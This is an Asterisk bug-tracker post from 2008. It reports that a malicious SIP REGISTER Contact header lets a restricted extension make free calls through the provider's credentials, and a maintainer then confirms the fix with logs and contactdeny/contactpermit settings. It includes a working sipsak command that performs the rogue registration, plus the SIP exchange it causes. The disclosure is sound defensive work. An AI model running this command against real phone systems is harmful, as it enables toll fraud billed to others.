[asterisk-bugs] [Asterisk 0011776]: [authenticaion] in sip.conf: A malicius "Contact" header in REGISTER can get free calls through SIP provider
Asterisk Bug Tracker
noreply at bugs.digium.com
Fri Sep 12 13:34:17 CDT 2008
A NOTE has been added to this issue.
======================================================================
http://bugs.digium.com/view.php?id=11776
======================================================================
Reported By: ibc
Assigned To: blitzrage
======================================================================
Project: Asterisk
Issue ID: 11776
Category: Channels/chan_sip/Registration
Reproducibility: always
Severity: minor
Priority: normal
Status: ready for testing
Asterisk Version: 1.4.17
SVN Branch (only for SVN checkouts, not tarball releases): N/A
SVN Revision (number only!):
Disclaimer on File?: N/A
Request Review:
======================================================================
Date Submitted: 2008-01-16 05:57 CST
Last Modified: 2008-09-12 13:34 CDT
======================================================================
Summary: [authenticaion] in sip.conf: A malicius "Contact"
header in REGISTER can get free calls through SIP provider
Description:
Hi, a malicius "Contact" header can be very damaged as I explain in the
following example:
Suppose our Asterisk has configured a SIP provider "sip_provider" with
"realm=sip_provider.com" and a SIP local phone "2001" who is not allowed to
do calls through "sip_provider":
sip.conf:
------------------------------------------
[authentication]
auth = client_number:client_password at sip_provider.com
[sip_provider]
type = peer
host = sip_provider.com
[2001] ; local phone
type = friend
secret = 1234
context = from_phone
------------------------------------------
extensions.conf:
------------------------------------------
[from_phone]
; Just allow to do test calls
exten => 500,1,Echo
exten => 501,1,PlayBack(demo-congrats)
exten => _200X,1,Dial(SIP/${EXTEN}) ; call to himself and other local
phones
------------------------------------------
Note that for the "sip_provider", instead of using "secret" and "username"
in the peer definition we have defined an "auth" in [autheticacion]
section. AFAIK this is perfectly valid.
Note too that "phone" is just allowed to call 500, 501 and 200X (so
calling to 2001 he would call himself).
Now because the owner of 2001 phone is angry he decides to hack the
enterprise PBX by doing it:
sipsak -U -C "sip:0034999000111 at sip_provider.com:5060" -a "1234" -s
sip:2001 at asterisk_ip
This will cause a malicious registration in Asterisk for the AoR
"sip:2001 at asterisk_ip".
Now this person calls to himself by calling to 2001 extension:
- Asterisk then by the execution of dialplan will do:
Dial(SIP/2001)
- This will cause an INVITE to the sip_provider and replies like:
* asterisk_ip -> sip_provider.com
INVITE sip:0034999000111 at sip_provider.com:5060 SIP/2.0
From: "asterisk" <sip:asterisk at asterisk_ip>
To: <sip:0034999000111 at sip_provider.com:5060>
* sip_provider.com -> asterisk_ip
SIP/2.0 407 Proxy Authentication Required
Proxy-Authenticate: Digest algorithm=MD5, realm="sip_provider.com",
nonce="1748d3"
* asterisk_ip -> sip_provider.com
INVITE sip:0034999000111 at sip_provider.com:5060 SIP/2.0
From: "asterisk" <sip:asterisk at asterisk_ip>
To: <sip:0034999000111 at sip_provider.com:5060>
Proxy-Authorization: Digest username="client_number",
realm="sip_provider.com", algorithm=MD5,
uri="sip:0034999000111 at sip_provider.com:5060", nonce="1748d3",
response="70d491d8998a961dc"
* sip_provider.com -> asterisk_ip
183 Session Progress
ooohhhhhh !!!
So the malicious user has made a PSTN call by free!
======================================================================
----------------------------------------------------------------------
(0092443) blitzrage (administrator) - 2008-09-12 13:34
http://bugs.digium.com/view.php?id=11776#c92443
----------------------------------------------------------------------
OK, from what I can tell this is all working now!
[Sep 12 10:34:00] WARNING[4158]: chan_sip.c:8276 parse_register_contact:
Host '192.168.128.106' disallowed by rule
[Sep 12 10:34:00] WARNING[4158]: chan_sip.c:8800 register_verify: Failed
to parse contact info
-- Registered SIP '2001' at 192.168.128.100 port 57664 expires 3600
[Sep 12 10:34:10] NOTICE[4158]: chan_sip.c:15473 handle_request_subscribe:
Received SIP subscribe for peer without mailbox: 2001
-- Executing [2001 at bug11776:1] Dial("SIP/2001-120964e0", "SIP/2001")
in new stack
-- Called 2001
-- SIP/2001-120a01b0 is ringing
== Spawn extension (bug11776, 2001, 1) exited non-zero on
'SIP/2001-120964e0'
sip.conf
--------
[general]
dynamic_exclude_static = yes ; Disallow all dynamic hosts from
registering
; as any IP address used for staticly
defined
; hosts. This helps avoid the
configuration
; error of allowing your users to register
at
; the same address as a SIP provider.
contactdeny=0.0.0.0/0.0.0.0 ; Use contactpermit and contactdeny
to
contactpermit=192.168.128.100/255.255.255.255 ; restrict at what IPs your
users may
; register their phones.
So I restricted chan_sip to only allow my softphone from my laptop to
register. When I tried to perform the register to forward the call to
192.168.128.106 (my 'service provider' I ended up with the denial message.
Calls worked as expected when I registered with the softphone from the
allowed IP address.
So from what I can tell, this is all working now!
Issue History
Date Modified Username Field Change
======================================================================
2008-09-12 13:34 blitzrage Note Added: 0092443
======================================================================
More information about the asterisk-bugs
mailing list